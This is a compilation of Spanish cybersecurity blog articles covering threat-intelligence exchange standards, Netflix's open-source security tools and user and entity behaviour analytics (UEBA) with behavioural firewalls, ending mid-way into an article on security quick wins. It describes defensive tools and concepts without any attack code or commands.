lenguaje Cyber Observable eXpression (CybOX) proporciona una estructura com√∫n para representar ciberobservables entre las √°reas operativas de seguridad cibern√©tica empresarial para mejorar la consistencia, eficiencia e interoperabilidad de las herramientas y los procesos implementados, as√≠ como aumenta la conciencia global de la situaci√≥n al permitir el potencial para la distribuci√≥n automatizada detallada, la cartograf√≠a, la detecci√≥n y la heur√≠stica del an√°lisis. - IODEF (RFC5070) : El Formato de Intercambio "Descripci√≥n de Objeto de Incidente" (IODEF) define una representaci√≥n de datos que proporciona un marco para compartir informaci√≥n intercambiada com√∫nmente por equipos de respuesta a incidentes de seguridad inform√°tica (CSIRT) sobre incidentes de seguridad inform√°tica. - IDMEF (RFC4765) : El prop√≥sito del Formato de Intercambio de Mensajes de Detecci√≥n de Intrusi√≥n (IDMEF) que es experimental , pretende definir los formatos de datos y procedimientos de intercambio para compartir informaci√≥n de inter√©s para sistemas de detecci√≥n y respuesta de intrusi√≥n y sistemas de gesti√≥n que puedan necesitar interactuar con ellos. - MAEC : Los proyectos de Enumeraci√≥n y Caracterizaci√≥n de Atributos de Malware (MAEC) est√°n dirigidos a crear y proporcionar un lenguaje estandarizado para compartir informaci√≥n estructurada sobre malware basada en atributos tales como comportamientos y patrones de ataque. - STIX 2.0 : El lenguaje de eXpression de informaci√≥n sobre amenazas estructuradas (STIX) es un estandar para representar informaci√≥n de amenaza cibern√©tica. El lenguaje STIX tiene la intenci√≥n de transmitir toda la gama de informaci√≥n potencial de amenazas cibern√©ticas y se esfuerza por ser totalmente expresivo, flexible, extensible y automatizable. STIX no s√≥lo permite campos agn√≥sticos de herramientas, sino que tambi√©n proporciona los llamados mecanismos de prueba que proporcionan medios para incrustar elementos espec√≠ficos de herramientas, como OpenIOC, Yara y Snort. - TAXII La norma Trusted Automated eXchange of Indicator Information (TAXII) define un conjunto de servicios e intercambios de mensajes que, una vez implementados, permiten el intercambio de información. ## Investigación, Estándares y Libros de Threat Intelligence - APT Cyber Criminal Campaign Collection : Amplia colección de campañas (históricas). Las entradas provienen de varias fuentes. - APTnotes : Una gran colección de fuentes sobre amenazas persistentes avanzadas (APTs). Estos informes suelen incluir conocimientos estratégicos y tácticos o asesoramiento. - ATT & CK : Tácticas Adversarias, Técnicas y Conocimiento Común (ATT & CK ™) es un modelo y marco para describir las acciones que un adversario puede tomar mientras opera dentro de una red empresarial. ATT & CK es una referencia común en constante crecimiento para las técnicas posteriores al acceso que permite conocer mejor las acciones que se pueden ver durante una intrusión en la red. MITRE está trabajando activamente en la integración con constructores relacionados, como CAPEC, STIX y MAEC. - Construyendo Estrategias de Búsqueda de Amenazas con el Modelo Diamante : Blogpost de Sergio Caltagirone sobre cómo desarrollar estrategias inteligentes de búsqueda de amenazas mediante el uso del Modelo Diamante. - Repositorio Cyber Analytics de MITRE : El repositorio de Cyber Analytics (CAR) es una base de conocimientos de analítica desarrollada por MITRE basada en el modelo de amenazas Adversary Tactics, Techniques y Common Knowledge (ATT & CK ™). - Guía definitiva para la inteligencia de amenazas cibernéticas : Describe los elementos de la inteligencia de la amenaza cibernética y discute cómo es recolectada, analizada y utilizada por una variedad de consumidores humanos y tecnológicos. Además examina cómo la inteligencia puede mejorar la seguridad cibernética en los niveles táctico, operacionales y estratégicos. --- # Las herramientas Open Source del equipo de seguridad de Netflix URL: https://ciberseguridad.blog/las-herramientas-open-source-del-equipo-de-seguridad-de-netflix/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-09-30 Actualizado: 2026-09-29 Tema: Operaciones de Seguridad > Hace ya tres años del primer lanzamiento de software de open source que lanzó el equipo de Netflix Cloud Security. A día de hoy, cuentan con más de a 15 proyectos de código abierto , y como no, Netflix lo esta haciendo realmente bien en este ámbito también (He de reconocer que soy un gran admirador de la cultura Netflix y de su gran trabajo). Muchas de las herramientas que ha lanzado el equipo de Netflix tienen como objetivo facilitar la seguridad en organizaciones de desarrollo de software de Hace ya tres años del primer lanzamiento de software de open source que lanzó el equipo de Netflix Cloud Security. A día de hoy, cuentan con más de a 15 proyectos de código abierto , y como no, Netflix lo esta haciendo realmente bien en este ámbito también (He de reconocer que soy un gran admirador de la cultura Netflix y de su gran trabajo). Muchas de las herramientas que ha lanzado el equipo de Netflix tienen como objetivo facilitar la seguridad en organizaciones de desarrollo de software de alta velocidad y distribuido, siendo la automatización una parte importante del enfoque. Actualmente, la escalabilidad, la velocidad y la integración deberían ser las claves que permiten que la empresa se mueva rápido. Netflix lo esta haciendo realmente bien, y por que no, fijarnos en como lo están haciendo en el ámbito de la seguridad. Y por ello, os dejo las aplicaciones que el equipo de seguridad de Netflix ha desarrollado: - Security Monkey fue la primera versión del equipo OSS de Netflix por Junio de 2014. Security Monkey es una herramienta para monitorear la seguridad en entornos cloud (originalmente y como entorno más importante, AWS - Amazon Web Services), incluyendo análisis y respuesta a configuraciones erróneas, vulnerabilidades y otros temas de seguridad. En marzo de 2017, los ingenieros de Google agregaron el soporte de Google Cloud Platform a Security Monkey . - Scumblr , Sketchy y Workflowable fueron anunciadas y lanzadas en conjunto en Agosto de 2014. Juntos, sirven como una plataforma de contribución y flujo de trabajo en inteligencia de seguridad de varios recursos en Internet (por ejemplo, vertederos de credenciales, relevancias de medios sociales), pero que ha evolucionado para convertirse en la plataforma de automatización principal del equipo de seguridad de Netflix. Scumblr es una aplicación web que te permite configurar varias búsquedas web y recopilar y actuar sobre dichos resultados. Sketchy es una API basada en tareas para tomar capturas de pantalla y rastrear texto de sitios web, y Workflowable es una joya de Ruby que añade funcionalidad de flujos de trabajo flexibles a las aplicaciones de Ruby on Rails. - FIDO , (Lanzada en Mayo de 2015) , o Fully Integrated Defense Operation es una herramienta para la respuesta automatizada de incidentes de seguridad . Comenzó como un experimento hace muchos años para ver cómo la vinculación en la API del sistema de asistencia técnica podría acelerar la respuesta a los incidentes de malware, y finalmente evolucionó en el sistema para la orquestación de respuestas de seguridad dentro de nuestro entorno corporativo de Netflix. En este momento, FIDO está obsoleto por parte de Netflix y el código ya no se mantiene, aunque sigue estando disponible, siendo una de las grandes joyas de la aportación. - Sleepy Puppy (Lanzada en Agosto de 2015) es una herramienta para gestionar las cargas útiles y la propagación de cross-site scripting (XSS) a lo largo del tiempo, ayudando a los equipos y hackers de seguridad de aplicaciones a rastrear y evaluar el impacto de los problemas XSS (históricamente uno de los tipos más extendidos de vulnerabilidad de aplicaciones web ). También se lanzó por parte de Netflix una extensión para Burp Proxy , una herramienta popular para las pruebas de seguridad en aplicaciones web. - Lemur , es un sistema para agilizar y automatizar la gestión y supervisión de certificados SSL / TLS, fue lanzado en septiembre de 2015 . La gestión de certificados PKI y SSL ha sido un problema históricamente difícil, y es por ello que el equipo de seguridad de Netflix desarrolló Lemur. En la conferencia AppSecUSA se cubrió el uso de Lemur en contexto de la gestión de TLS en toda la empresa y en AWS ,como ejemplo de cómo automatizar la seguridad. - BLESS (Lanzada en Mayo de 2016), o Servicio SSH efímero de bastionado de Lambda, es una Autoridad de Certificado SSH (CA) que funciona con la función AWS Lambda y que se utiliza para firmar claves públicas SSH. El uso de una CA SSH proporciona una variedad flexible de opciones como autorizador, especialmente en entornos de gran escala y de rápido movimiento como Netflix o empresas de gran tamaño. - HubCommander (Lanzada en Febrero de este mismo año) es un framework de bot Slack utilizados para la gestión basada en ChatOps de las organizaciones GitHub . Permite proporcionar autoservicio simple basado en Slack para varias acciones GitHub de nivel administrativo, manteniendo el control de acceso y un registro de auditoría. Pero que aunque el mantenimiento de GitHub era su intención original, sus nuevas versiones son un framework de bot más general. - Stethoscope (Lanzada a la vez que HubCommander) es un sistema que recopila información sobre diversos temas de seguridad relacionados con el usuario final (por ejemplo, seguridad de dispositivos) y proporciona a los usuarios finales consejos claros y útiles para mejorar la seguridad. Netflix lo usa para alinearse con la cultura de brindar a los empleados la libertad y el contexto para administrar con seguridad sus propios dispositivos. - BetterTLS (Lanzada en Abril de 2017) es un conjunto de pruebas para clientes HTTPS que implementan la verificación de la extensión de certificado de restricciones de nombre. Utilizado para identificar y ayudar a corregir los problemas de implementación en las tan variadas ofertas de TLS de varios proveedores. - Repokid y Aardvark (Junio ​​de 2017) son herramientas que simplifican y agilizan el proceso de implementación de mínimo privilegio en AWS IAM (Identity and Access Management). Estas herramientas funcionan observando activamente los servicios de AWS que utilizan un rol de IAM y recortando los permisos eliminando el acceso a los servicios no utilizados. - Repulsive Grizzly y Cloudy Kraken son herramientas que lanzadas el mes de julio para el proyecto Skunkworks, se esta haciendo público el código, pero no se estan planeando actualizaciones periódicas o mantenimiento a largo plazo. Estas herramientas ayudan a simular ataques DDoS en los entornos de Netflix , con Repulsive Grizzly simplificando la coordinación y la ejecución de pruebas y Cloudy Kraken actuando como framework de orquestación AWS para escalar las pruebas. Estos son los 15 proyectos de Open Source que Netflix a liberado, los cuales podemos seguir su evolución en GitHub o la cuenta @NetflixOSS en Twitter. --- # UEBA (User and Entity Behavior Analytics) detección por comportamiento URL: https://ciberseguridad.blog/ueba-user-and-entity-behavior-analytics-deteccion-por-comportamiento/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-08-30 Actualizado: 2026-10-04 Tema: Operaciones de Seguridad > Es muy pronto para empezar a "augurar" nuevas tendencias en seguridad para 2018, pero con la llegada de los iSOC 3.0 y el foco puesto en el negocio, las soluciones UEBA con el complemento perfecto para aquellas empresas, ya maduras lo suficientemente para empezar a controlar patrones de comportamiento y que tenga tengan controlados los perimetros y las aplicaciones. Recordemos por un momento la evolución de los SOC : * SOC 1.0, 'Asegurar el Perímetro': nivel básico de análisis de seguridad Es muy pronto para empezar a "augurar" nuevas tendencias en seguridad para 2018, pero con la llegada de los iSOC 3.0 y el foco puesto en el negocio, las soluciones UEBA con el complemento perfecto para aquellas empresas, ya maduras lo suficientemente para empezar a controlar patrones de comportamiento y que tenga tengan controlados los perimetros y las aplicaciones. Recordemos por un momento la evolución de los SOC : - SOC 1.0, 'Asegurar el Perímetro': nivel básico de análisis de seguridad actualmente empleado por la mayoría de los vendedores. - SOC 2.0, "Proteción sobre la aplicación". El 25% del malware encontrado hasta ahora es nuevo y no ha sido detectado por los métodos tradicionales. Debemos controlar traficos y flujos mediante sondas con comportamiento en red entre otros. - SOC 3.0, "Asegurar el negocio". El nivel SOC 3.0 aspiracional utiliza análisis predictivo y la base de datos de amenazas para identificar los tipos de amenaza que experimenta un cliente y luego trabajar proactivamente para reducir el número de amenazas del mismo Ante estos último, las herramientas de las que hoy os hablo, y en la que diría, empezaran a ser el proximo foco cercano, "mojandome ya" creo que seran una de las tendencias 2018 en ciberseguridad. ## ¿Qué es UEBA vs SUBA vs UBA? UEBA es el término definido por Gartner para User and Entity Behavior Analytics . El concepto también se puede denominar SUBA por Security User Behavior Analytics , término en este caso acuñado por Forrester Research, así como UBA para User Behavior Analytics, o incluso en muchas web de producto denominados como Analytics Behavioral o incluso Behavioral Analysis. Estos términos diferentes se utilizan en su mayoría de manera intercambiable y definen UEBA como el analisis del comportamiento de las personas que están conectadas a la red de una organización, así como entidades, o puntos finales como servidores, cuentas, portátiles, aplicaciones, etc. En este caso, la "gente" podrían ser empleados, así como terceros proveedores o contratistas que tengan acceso a diferentes partes de la red. UEBA se utiliza para la detección de amenazas, tanto para la detección de fallos externos como para la identificación de intrusos . Desde una perspectiva del comportamiento, aprende lo que las personas y las entidades hacen sobre una base "normal", ¿de dónde se conectan normalmente, a qué servidores de archivos y aplicaciones están accediendo, desde qué dispositivos se conectan , qué privilegios tienen, cómo de fuertes son sus contraseñas, etc.... buscando establecer una línea base de lo que es el comportamiento habitual del que no lo es. Al entender lo que es este comportamiento normal de los usuarios y las entidades, cuando algo inusual ocurre, UEBA lo detectará. > Un usuario acceda a un servidor al que normalmente no accede desde una ubicación extranjera. La mayoría de las soluciones UEBA aprenden el comportamiento de los usuarios, grupos y dispositivos para establecer líneas base y aplicar porcenajes de riesgo adaptativo a lo largo del tiempo basado en dicha actividad. Si se produce un incidente de seguridad, la puntuación de riesgo sube o cambia según el tipo de amenaza. Esto no sólo ayuda a identificar las amenazas, sino que también ayuda a las organizaciones a realizar un seguimiento de quiénes son sus usuarios inseguros y privilegiados, identificar cuentas obsoletas, contraseñas débiles, puntos finales compartidos y mucho más. [Imagen: User-Behavior-Analytics] Al aprender el comportamiento, permite detectar e identificar riesgos o amenazas de seguridad tales como: - Compromiso de credenciales - Insecure Insiders - Usuarios Privilegiados - Hackers maliciosos - Incumplimientos - Ataques de fuerza bruta a Contraseña UEBA ha surgido porque la mayoría de las soluciones de análisis basadas en registros, como es el SIEM, son inversas y no se vuelven más precisas con el tiempo, ni aprenden. Es difícil recolectar y correlacionar todos los eventos. A menudo generan un gran volumen de incidentes, o alertas, que requieren cobertura 24x7 y respuesta manual del equipo de seguridad para determinar si existe una amenaza real. Y esa determinación toma un poco de tiempo debido a la falta de recursos, o incluso las habilidades técnicas para identificar con precisión lo que sucedió durante en incidente. Durante ese tiempo, los atacantes son libres de recorrer la red. Con el aprendizaje constante de la UEBA, se puede proporcionar una mayor visibilidad y conocimientos para no sólo detectar más rápidamente una amenaza potencial, sino también ayudar a una organización a reducir su superficie de ataque mediante la identificación y eliminación de fallas de seguridad aprendidas. Hoy en día, en que las amenazas internas y las violaciones externas crecen fuertemente , las organizaciones tienen que mirar más allá de sus preocupaciones en el perímetro y echar un vistazo a la detección de amenazas internas. ## Behavioral Firewall Las soluciones tradicionales de la UEBA se centran principalmente en la analítica basada en registros y están situadas encima de los sistemas de Gestión de Incidentes y Eventos de Seguridad (SIEM). Los datos proporcionan una visibilidad del comportamiento del usuario mucho mayor y reducen el ruido para las organizaciones que han confiado en solamente en un SIEM. En primer lugar, las soluciones tradicionales de UEBA miran actividad hacia atrás, lo que significa que a veces los registros aparecen 12-18 horas más tarde de que un posible hacker ya haya entrado y salido de nuestra organización. Aunque hay datos que admiten que se necesita una mediana de 150 a 200 días para que un atacante sea descubierto, hay muchos atacantes que han entrado y se han ido antes de que los registros aparezcan. En segundo lugar, la recolección de registros de diferentes vendedores y dispositivos es un reto, y esto se aplica a organizaciones de prácticamente todos los tamaños. Hay un nivel de abstracción en los propios registros que pueden no tener los detalles deseados. En esencia, son como registros de terceros porque el SIEM ya lo ha digerido. Tercero, requiere una cobertura 24x7. Sólo 1 de cada 4 empresas tiene cobertura 24x7. Cuando uno mismo es el analista de seguridad y quien decide si una amenaza es o no un falso positivo, obtenemos una inteligencia que progresará o se hará más inteligente con el tiempo. Los firewalls conductuales adoptan un nuevo enfoque a las soluciones UEBA. A diferencia de las soluciones tradicionales de UEBA, los cortafuegos de comportamiento se solapan en una capa superior al SIEM. Una de las principales diferencias es que los Firewalls de Comportamiento combinan UEBA y una respuesta adaptativa a políticas flexibles de respuesta de empresas amigables a responder y ayudar a prevenir amenazas de seguridad en tiempo real (CERTs). [Imagen: Behavioral Firewalls] Algunas de las capacidades clave de Firewalls conductuales son: - Comportamiento del usuario y verificación de identidad : La automatización de la mitigación de riesgos sin la intervención directa de los equipos de seguridad, manteniendo la continuidad del negocio, es fundamental para contrarrestar los ataques y evitar compromisos. Detectar cambios sospechosos en la red y el comportamiento del usuario es el principal punto de partida. Los firewalls de comportamiento analizan continuamente el comportamiento del usuario y desarrollan porcentajes de riesgo. Aprenden lo que están haciendo los usuarios, cuándo lo están haciendo, dónde lo están haciendo, desde qué puntos finales vienen, qué servidores van a utilizar, a qué servicios acceden y mucho más. La respuesta de grano fino en tiempo real permite a las organizaciones elegir cómo quieren validar un comportamiento sospechoso y confirmar la identidad del usuario final. Por ejemplo, cuando un usuario intenta acceder a varios servidores de la red en un corto período de tiempo, y nunca lo ha hecho antes, un firewall de comportamiento puede confirmar la identidad del usuario de forma instantánea y sin comprometer al analista de seguridad. Una verificación exitosa no interrumpe los negocios al tiempo que garantiza la seguridad. Si la verificación del usuario falla, se impide al usuario acceder a los servidores, de nuevo sin la participación del analista de seguridad. - Respuestas adaptativas basadas en políticas : Las respuestas activas basadas en políticas pueden resolver si la actividad sospechosa es sólo actividad anormal que no requiere intervención del equipo de seguridad, así como escalar cuando la respuesta identifica un riesgo tangible alimentado por el usuario. Esto permite a los profesionales de la seguridad centrar su atención en escalados y no en anomalías. Cuando se detecta un comportamiento anormal, un firewall de comportamiento aplica automáticamente una acción a los usuarios como permitir, bloquear, notificar, aislar o desafiar con autenticación de segundo factor o Multi Factores, todo en tiempo real. Resolver actividades sospechosas no es sólo detener a los atacantes, sino también controlar sistemas críticos para la continuidad del negocio con usuarios válidos. Tener políticas flexibles permite a las organizaciones ajustar las políticas basadas en las necesidades específicas de una organización. Por ejemplo, las políticas pueden estar vinculadas a diferentes vectores de amenaza, como la puntuación de riesgo, el tipo de activo, el tipo de amenaza, el tipo de usuario, el nivel de confianza del incidente, etc. El valor entra en juego cuando se considera cómo responder a cambios que podrían constituir un movimiento lateral por parte de un atacante. Para detectar escenarios más complejos, las políticas adaptativas pueden responder con una combinación de técnicas de prevención. Esto ayuda a las organizaciones a desafiar al atacante potencial y evita que los profesionales de seguridad tengan que dedicar tiempo y recursos a falsos positivos. ### ¿Dónde se implementan los firewalls de comportamiento? A diferencia de las soluciones UEBA tradicionales que se sitúa encima de un SIEM, un firewall de comportamiento es un dispositivo virtual que puede ser desplegado en línea, delante de los controladores de dominio o sniffer (cerca de situaciones de tiempo real) en modo de aprendizaje del comportamiento del usuario para que pueda proporcionar ideas e incidentes que pueden ser accionados o disparados con los Triggers indicados anteriormente. Normalmente, los clientes a menudo lo despliegan en el modo sniffer hasta tner la confianza necesaria para implementarlo en línea, aprovechando las capacidades de bloqueo. ## Detección más rápida de amenazas Estamos en una epoca en la que vemos casi todos los días brecha de seguridad. Con el perímetro casi ausente, las empresas no sólo tienen que preocuparse de los atacantes externos, sino que necesitan preocuparse por las amenazas internas. Según Verizon, el 63% de las violaciones de datos confirmadas involucraban a atacantes que se presentaban como usuarios legítimos (usando credenciales robadas) o usuarios legítimos que explotaban maliciosamente su acceso, conocidos como Insiders. Las soluciones de UEBA ayudan a detectar las amenazas más rápidamente. Con una mayor visibilidad y comprensión de la actividad continua del usuario, es posible detectar más fácilmente comportamientos inusuales. Podemos ver un par de ejemplos de cómo puede ayudar a detectar mejor las amenazas: - Detección en tiempo real cuando ocurren actividades inusuales: Debido a que la UEBA está monitoreando continuamente el comportamiento del usuario, puede detectar cuando algo está fuera de la norma y responder en tiempo real a la posible amenaza haciendo una verificación de identidad o escalando el incidente al equipo de seguridad correspondiente (CSIRT) - Búsqueda de Inteligencia Forense / Amenazas: El aprendizaje automático permite a las soluciones UEBA tener una comprensión multidimensional de los usuarios y los analistas pueden buscar o investigar proactivamente amenazas potenciales. Por ejemplo, un analista podría hacer una búsqueda para que todos los usuarios que hayan iniciado sesión en nuestra VPN de un país específico y hayan accedido a un servidor al que nunca habian accedido. ## Respuesta en tiempo real a las amenazas El tiempo de espera en ciberseguridad (el tiempo que tarda en detectar una amenaza avanzada una vez que ha roto la infraestructura de una organización) de un atacante dentro de una organización pueden ser días, meses o incluso años. Las campañas de phishing mejoradas y otros métodos sofisticados permiten a los atacantes comprometer una organización y hacer daño mucho antes de llegar a ser detectados. Las soluciones de UEBA, como Firewalls de Comportamiento , pueden adelantarse a esa amenaza y responder activamente al posible incidente en tiempo real en lugar de simplemente enviar una alerta que entrará en una cola de innumerables otras alertas de investigación. Si, basado en el comportamiento del usuario, cuando algo parece inusual o peligroso, un firewall de comportamiento puede responder proactivamente a las amenazas y detenerlas sin la intervención humana. Con las políticas personalizables, una empresa puede responder con un conjunto de respuestas en tiempo real de grano fino, incluyendo Bloquear, Modificar, Notificar, Reautenticar o Autenticación Multi Factor, entre otros como hemos comentado, en la que mediante una de variedades de políticas y mecanismos de respuesta garantizamos que las amenazas reales se detengan mientras se permite a los usuarios legítimos continuar con su trabajo sin parar al negocio. ## Menor riesgo y reducción de la superficie de ataque Una de las grandes ventajas de UEBA es el nivel de conocimientos que un cliente recibe a través del análisis interactivo y las instantáneas del estado de la red. Estos conocimientos permiten a los clientes reducir proactivamente su superficie de ataque, lo que dificulta que los atacantes maliciosos comprometan la red. Los conocimientos que aportan las soluciones UEBA permiten a los equipos de seguridad comprender mejor los puntos débiles y abordarlos antes de que se produzca un incidente, así como ayudar a acelerar la investigación de incidentes. Algunas áreas donde podemos reducir el riesgo de las organizaciones, son : - Las actividades de los usuarios privilegiados y su cumplimiento con la política de seguridad - Usuarios con contraseñas débiles - Identificación de cuenta obsoletas - Usuarios compartidos - Puntos finales de alto riesgo - Historial de acceso interactivo - Cronogramas de incidentes de usuario ## Reducción de eventos y mejora de la Eficiencia Operacional de ciberseguridad Con todos los grandes beneficios que ofrece el Big Data, esto puede ser abrumador para los equipos de seguridad y afectar negativamente a su ciberestrategia . Los equipos están sobrecargados y carecen de personal debido a la gran demanda de recursos, y debido a que se pasa persiguiendo una gran cantidad de alertas de seguridad, muchas de ellas, falsos positivos o de gravedad no confirmada , con procesos lentos, repetitivos e insatisfactorios. Aquí es donde las soluciones más avanzadas de UEBA, como los Firewall de Comportamiento, pueden ayudar a los equipos sobredimensionados a proporcionar una capa de automatización y inteligencia / conocimientos de seguridad. Al detectar un comportamiento inusual, se puede verificar y validar la amenaza sin intervención manual. Con múltiples mecanismos de respuesta automatizados, un firewall de comportamiento puede verificar incidentes o despriorizar la actividad benigna mediante la participación directa del usuario final. Este nivel de automatización permite que un equipo de seguridad se centre en las amenazas reales y menos en la persecución de alertas. UEBA también puede ayudar con más eficacia, ayudando con las investigaciones de incidentes, proporcionando una visibilidad profunda y un conocimientos sobre el comportamiento del usuario y la entidad. Estos conocimientos también pueden ayudar a los equipos de seguridad a identificar más fácilmente las medidas de seguridad proactivas que pueden implementar para reducir la superficie total de ataque. ## ¿Cómo de rápido puedo poner en funcionamiento un UEBA y con qué rapidez proporcionaré valor y ROI? En el entorno de seguridad actual, estas son quizás las preguntas más importantes que debemos hacernos. A pesar de que muchas organizaciones han dedicado más presupuesto a encontrar maneras de asegurar mejor su organización, la realidad es que independientemente de cuánto más presupuesto tienen, la gran mayoría de los equipos de seguridad están sobresaturados. Poner en marcha un nuevo proyecto, puede no ser factible si el tiempo implicado en la puesta en práctica es demasiado largo o complicado. Si ademas, tenemos en cuenta que la seguridad es ahora una discusión a nivel de junta directiva, mostrar un valor rápido es una parte muy importante en la ecuación. Pero la gran noticia, es que, las soluciones UEBA, puede ser sencillas y fáciles de implementar, obteniendo en una organización tiempos de despliegue y obención de resultados muy cortos en el tiempo. [Imagen: UEBA Gartner] ## Desplegar UEBA UEBA ha existido desde hace tiempo y diferentes soluciones tienen diferentes métodos de implementación. Hay diferentes integraciones y tareas de preparación de datos necesarias para obtener los mejores resultados desde una perspectiva de aprendizaje de la máquina mientras se supervisa el comportamiento del usuario. En algunos casos, la preparación de datos y la creación de reglas antes de un despliegue tradicional de soluciones UEBA puede ser una tarea ardua y que requiera mucho tiempo, lo que puede afectar mucho al tiempo de implantación y obtención de valor. Las soluciones avanzadas de UEBA actuales, que están realizando detección y prevención, como los cortafuegos de comportamiento , se pueden instalar con bastante rapidez y no tienen los requisitos de preparación de datos de las soluciones UEBA tradicionales. Obteniendo rápidamente, "estamos hablando de unas pocas horas" resultados para la gran mayoría de las empresas. ### ¿Cómo se instala un firewall de comportamiento? Los firewalls de comportamiento se implementan en la red. Normalmente se implementan como un proxy en frente de los controladores de dominio a través de la red con una única administración centralizada. Esto permite un fácil despliegue en ubicaciones remotas, así como una mayor escalabilidad y cobertura. Para aquellos que dudan en implementarlo en línea al comenzar, un firewall de comportamiento también puede implementarse en modo de sniffer pasivo y reconfigurarlo en modo proxy posteriormente. Hay una ventaja en el lado de la prevención, ya que también puede aprovechar los mecanismos de respuesta tales como la autenticación Multi Factor (como Duo , RSA, etc.), bloqueo en tiempo real y capacidades de aislamiento basadas en políticas empresariales. Para aquellas empresas sin el personal de seguridad para responder a cada amenaza (Diría que todas), esta es una gran manera de llegar muy lejos, muy rápidamente, sin interrumpir el proceso de negocio. El Firewall de Comportamiento también puede integrarse con otras fuentes de datos, como SIEM, inteligencia de amenazas, etc. para enriquecer aún más el análisis de comportamiento, pero las mismas no son un requisitos, por lo que para aquellas pequeñas empresas sin SIEM, esta es una ventaja clave. Una vez desplegado, se tarda aproximadamente 2-3 semanas en aprender el comportamiento de todos los usuarios, entidades y servidores en toda la red y establecer una línea base. Como comentamos anteriormente, las respuestas específicas se basan en políticas personalizadas. Las políticas listadas de acuerdo con las mejores prácticas de seguridad brindarán valor desde el primer día. Cada organización puede querer agregar o ajustar las políticas basadas en su organización y entornos con el fin de acotar los permisos acordes a negocio de una mejor forma. La personalización de políticas es muy sencilla y la ventaja de un firewall de comportamiento es que con el tiempo, la política se adapta automáticamente por usuario para integrar automáticamente su comportamiento cambiante (como cuando cambia de rol, de proyecto, de ubicación, etc.). ## Retorno rápido de valor Una vez que el Firewall de Comportamiento haya hecho una linea base de comportamiento de todos los usuarios y entidades, las organizaciones verán en muy poco tiempo, mucho valor añadido. - **Identificación inmediata de riesgos **: Una vez que el Firewall de Comportamiento ha completado su aprendizaje de usuarios y entidades, proporciona visibilidad en muchas áreas que una organización puede mejorar rápida y proactivamente para reducir su superficie de ataque y su riesgo general. Puede identificar cuentas obsoletas, usuarios con contraseñas débiles, información detallada sobre cuentas de usuario privilegiadas y mucho más. Una información que se tardaría semanas en reunirse, está disponible en tiempo real. - **Reducción de Falso Positivos ** : Las respuestas automatizadas de un firewall de comportamiento pueden reducir significativamente la cantidad de falsos positivos con las que un equipo de seguridad pierde el tiempo. Al verificar la identidad y permitir que las transacciones legítimas ocurran, las empresas mantienen el proceso de negocio en movimiento y los datos se pueden volver a introducir en el análisis de comportamiento para que pueda seguir ajustando las líneas base y mantener al equipo de seguridad consciente de los incidentes más importantes para investigar . - Acelerar las investigaciones : Los dashboard fáciles de usar ayudan a los analistas de seguridad a tener una idea rápida de los datos , tniendo una profunda visibilidad de lo que están haciendo los usuarios, lo que puede ayudar a acelerar las investigaciones más grandes. Estas son sólo algunas de las formas en que las empresas pueden ganar valor de una forma rápida con soluciones avanzadas de UEBA / Behavioral Firewall. Otra área importante que no debe perderse es la de los beneficios de eficiencia operativa que obtienen los equipos de seguridad al tener un firewall de comportamiento. Para los equipos de seguridad sobrecargados esto puede marcar una gran diferencia sobre el día a día. ## Gestión de UEBA Con demasiadas amenazas y una infraestructura de seguridad cada vez más compleja, los equipos de seguridad de hoy en día no tienen tiempo para emprender proyectos complejos , costosos desde una perspectiva operacional. La innovación avanzada de UEBA facilita la gestión y la eficiencia operativa debido a tres áreas clave: Smart Insights, Integración y Automatización. Insights inteligentes - Aprender el comportamiento del usuario solía ser un esfuerzo complejo, que requiere grandes datos. Pero como hemos aprendido, más no significa mejor. Hay más espacio para errores estadísticos que conduce a más falsos positivos. - Con las ideas inteligentes, debe venir la simplicidad. Las soluciones más innovadoras de la UEBA se enfocan en brindar información de una manera fácil de entender, interpretar y actuar para facilitar a un equipo de seguridad ocupado encontrando maneras de reducir su riesgo y mejorar la seguridad. Integración - Las integraciones tampoco tienen que ser complejas. Con las integraciones simples mediante API, un equipo de seguridad puede mejorar tanto la analítica de comportamiento como las soluciones de terceros relacionadas. Los datos de comportamiento del usuario se pueden mejorar fácilmente con fuentes de datos adicionales que utilizan APIs para ajustar más a fondo una vista de 360 ​​grados del usuario. También se puede añadir valor adicional a algunas de las soluciones SSO (Single Sign On) y de autenticación existentes. Por ejemplo, si utilizamos Clearpass, Okta, RSA, Duo, SecureAuth u otros. Automatización - Como ya hemos comentado anteriormente, la UEBA como Firewalls de Comportamiento, automatizaran la respuesta a incidentes sospechosos . Mediante la reducción de la cantidad de incidentes y falsos positivos enviados al equipo de seguridad para el seguimiento, esta tarea manual y que consume tiempo que aumenta el costo total se elimina. - Las políticas listas para usar basadas en las mejores prácticas de seguridad brindarán valor al equipo de seguridad en el primer día. Las políticas se pueden agregar o personalizar si es necesario para habilitar aún más el negocio. Con el tiempo, las políticas se adaptan automáticamente por usuario para integrar automáticamente su comportamiento cambiante (como cambio de rol, proyectos, ubicación, etc.) sin necesidad de intervención de los analistas de seguridad. Con estos tres principios como base para el UEBA, no sólo se impulsa la facilidad de gestión, sino que también se proporciona un gran beneficio con una reducción de la sobrecarga en los equipos de seguridad y gastos generales. Las soluciones más recientes se enfocan en cómo habilitar mejor a los equipos de seguridad y obtener más valor de lo que se tiene. Con soluciones más avanzadas centradas más en cómo responder a las amenazas, y no empujar más sobre las alertas al SIEM, obteniendo realmente un gran impacto en la productividad del equipo. Aquí es donde una "solución" avanzada de UEBA realmente brilla. No es sólo otra herramienta, se convierte en una parte virtual del equipo. Cada vez que detecta comportamientos inusuales o de riesgo, inmediatamente toma medidas para verificar las actividades legítimas o ilegítimas de los usuarios y luego responde activamente basándose en los resultados para responder, bloquear, permitir, aislar y más. Al dar tiempo al equipo de seguridad, se puede ser más eficiente y dar seguimiento a investigaciones más importantes. > UEBA no es sólo otra herramienta más, se convierte en una parte virtual del equipo de seguridad --- # 10 “Quick-Win” en ciberseguridad URL: https://ciberseguridad.blog/10-quick-win-en-ciberseguridad/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2017-08-25 Actualizado: 2026-09-29 Tema: Operaciones de Seguridad > La forma en la que madurez de la ciberseguridad en una compañia se logra, va asociado a través de iniciativas priorizadas en el contexto del panorama de amenazas existentes en nuestra organización y la tolerancia al riesgo o apetito al mismo que tengamos. Mientras que cualquier programa de seguridad formal requiere supervisión e inversión, llegar a una instantánea rápida del nivel de madurez no debería ser un esfuerzo prolongado. Por ello, os muestro algunas acciones efectivas a considerar a la La forma en la que madurez de la ciberseguridad en una compañia se logra, va asociado a través de iniciativas priorizadas en el contexto del panorama de amenazas existentes en nuestra organización y la tolerancia al riesgo o 